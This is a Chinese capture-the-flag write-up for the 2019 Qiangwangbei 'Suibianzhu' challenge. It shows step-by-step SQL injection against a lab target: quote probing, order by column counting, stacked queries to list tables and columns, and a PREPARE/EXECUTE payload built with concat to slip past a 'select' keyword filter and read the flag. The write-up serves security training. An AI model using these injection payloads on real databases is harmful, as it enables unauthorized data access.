[强网杯 2019]随便注【堆叠注入】【预编译注入】

点击链接进入靶场环境
http://59150b49-1c5d-4065-918f-396c37e4c601.node3.buuoj.cn/
[强网杯 2019]随便注【堆叠注入】【预编译注入】_第1张图片
输入 1 查询:
[强网杯 2019]随便注【堆叠注入】【预编译注入】_第2张图片

输入 ‘ 查询:
在这里插入图片描述
输入 1’ or 1=1# 查询:
[强网杯 2019]随便注【堆叠注入】【预编译注入】_第3张图片
基本判断存在sql注入,常规操作使用 order by 查询列数,发现order by 2的时候是正常回显了,order by 3就出错了,只有2个字段。
[强网杯 2019]随便注【堆叠注入】【预编译注入】_第4张图片
接下来用union select 语句进行联合查询
在这里插入图片描述
然后发现关键词被过滤了,通过网上查询,得知了另一种方法:堆叠注入。开始尝试:
[强网杯 2019]随便注【堆叠注入】【预编译注入】_第5张图片
可以看到回显了databases,说明存在堆叠注入,然后继续爆表
[强网杯 2019]随便注【堆叠注入】【预编译注入】_第6张图片
查看表内容:

-1';show columns from `1919810931114514`;#

[强网杯 2019]随便注【堆叠注入】【预编译注入】_第7张图片

-1';show columns from words ;#

[强网杯 2019]随便注【堆叠注入】【预编译注入】_第8张图片
构造payload从 1919810931114514 查询 flag:

-1';PREPARE hacker from concat('s','elect', ' flag from `1919810931114514` ');EXECUTE hacker;#

相关知识:
concat()函数
MySQL的SQL预处理(Prepared)

得到flag:
[强网杯 2019]随便注【堆叠注入】【预编译注入】_第9张图片
另一种骚姿势获取flag,修改表名和字段名,扩展思维,参考:https://blog.csdn.net/qq_26406447/article/details/90643951

你可能感兴趣的:(buuctf)